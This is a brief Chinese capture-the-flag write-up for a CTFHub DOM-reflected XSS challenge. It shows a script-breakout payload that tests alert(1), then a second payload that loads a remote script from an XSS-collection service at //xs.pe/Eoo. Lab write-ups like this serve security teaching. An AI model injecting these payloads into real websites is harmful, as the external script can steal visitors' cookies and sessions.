根据框里的内容 直接右键查看网页源代码 看到 了其闭合方式
然后去网页测试一下alert(1)反射
';</script><script>alert(1)</script>
看到 确实存在 去xssaq.cn
创建一个项目 把src粘过来 在第一个输入框中 再将返回回来的url 复制粘贴到第二个 输入框中
';</script><sCRiPt sRC=//xs.pe/Eoo></sCrIpT>
CTFHub技能树web——XSS——DOM反射
A 八方2024-08-06 21:41
相关推荐
yinuo4 小时前
前端跨页面通讯终极指南⑥:SharedWorker 用法全解析PineappleCoder9 小时前
还在重复下载资源?HTTP 缓存让二次访问 “零请求”,用户体验翻倍拉不动的猪9 小时前
webpack编译中为什么不建议load替换ast中节点删除consolg.log李姆斯9 小时前
Agent时代下,ToB前端的UI和交互会往哪走?源码获取_wx:Fegn08959 小时前
基于springboot + vue健身房管理系统闲谈共视9 小时前
基于去中心化社交与AI智能服务的Web钱包商业开发的可行性CreasyChan9 小时前
C# 反射详解JIngJaneIL10 小时前
基于Java+ vue智慧医药系统(源码+数据库+文档)hashiqimiya11 小时前
两个步骤,打包war,tomcat使用war包零度@12 小时前
Java中Map的多种用法